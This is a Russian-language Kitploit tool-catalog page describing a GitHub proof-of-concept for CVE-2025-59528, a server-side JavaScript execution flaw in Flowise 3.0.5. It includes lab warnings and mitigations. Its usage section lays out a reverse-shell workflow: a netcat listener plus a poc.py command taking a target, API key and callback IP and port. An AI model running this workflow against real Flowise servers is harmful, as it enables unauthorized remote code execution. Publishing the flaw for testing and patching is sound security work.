Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/sonnelon/cve-2025-59528-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubsonnelon/cve-2025-59528-poc

CVE-2025-59528-PoC

The poc of CVE-2025-59528

Репозиторий
1 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-59528 PoC

Концепция доказательства (Proof of Concept) для исследования CVE-2025-59528 в изолированной лабораторной среде.

[!WARNING] ПРЕДУПРЕЖДЕНИЕ

Данный проект предназначен строго для образовательных целей, исследований в области безопасности и тестирования систем, которыми вы владеете или на тестирование которых у вас есть явное разрешение.

Не используйте этот PoC против сторонних серверов, публичных сервисов или инфраструктуры без разрешения владельца.

Автор не несёт ответственности за любой ущерб, потерю данных, нарушение работы сервисов или юридические последствия, возникшие в результате неправомерного использования данного проекта.

Описание

Этот PoC демонстрирует потенциальное воздействие уязвимости CVE-2025-59528, связанной с обработкой управляемого пользователем параметра mcpServerConfig в Flowise.

При определённых условиях уязвимость может позволить атакующему выполнить произвольный JavaScript-код в контексте серверной стороны.

Затронутые версии

  • Flowise 3.0.5

Исправленная версия

  • Flowise 3.0.6+

Всегда проверяйте точную версию целевой установки перед тестированием.

Требования

  • Python 3
  • requests
Скачать инструмент
  • Локальный или изолированный тестовый экземпляр Flowise
  • Авторизованная учётная запись с необходимыми разрешениями
  • Установите зависимость Python:

    root@kitploit:~
    pip install requests
    

    Использование

    Запустите netcat для получения shell:

    root@kitploit:~
    nc -lvnp <YOUR_PORT>
    

    Запустите PoC командой:

    root@kitploit:~
    python3 poc.py \
        -t http://TARGET:PORT \
        -o api_key \
        -i CALLBACK_IP \
        -p CALLBACK_PORT
    

    Аргументы

    АргументОписание
    -t, --targetURL тестового экземпляра Flowise
    -o, --api_keyAPI-ключ
    -i, --ipIP-адрес тестовой машины
    -p, --portПорт, используемый тестовым окружением

    Лабораторная настройка

    Тестирование должно выполняться внутри изолированной виртуальной или лабораторной сети.

    root@kitploit:~
    ┌──────────────────┐
    │    PoC Machine   │
    │                  │
    │    Python PoC    │
    └────────┬─────────┘
             │
             │ Isolated Network
             │
    ┌────────▼─────────┐
    │   Flowise 3.0.5  │
    │   Test Instance  │
    └──────────────────┘
    

    Не открывайте намеренно уязвимый экземпляр Flowise напрямую в публичном интернете.

    Меры по устранению

    Если вы используете затронутую версию Flowise:

    1. Обновите Flowise до исправленной версии.
    2. Ограничьте доступ к административным API.
    3. Не предоставляйте недоверенным пользователям разрешения, необходимые для доступа к уязвимой функциональности.
    4. Проверьте журналы сервера на наличие подозрительных запросов.
    5. Повторно протестируйте установку после обновления.

    Ссылки

    • CVE: CVE-2025-59528
    • Затронутое ПО: Flowise
    • Исправленная версия: 3.0.6+

    Правовое уведомление

    Используя этот проект, вы подтверждаете, что несёте единоличную ответственность за соблюдение всех применимых законов и нормативных требований.

    Используйте этот PoC только против систем, которыми вы владеете, или систем, на которых вам явно разрешено проводить тестирование безопасности.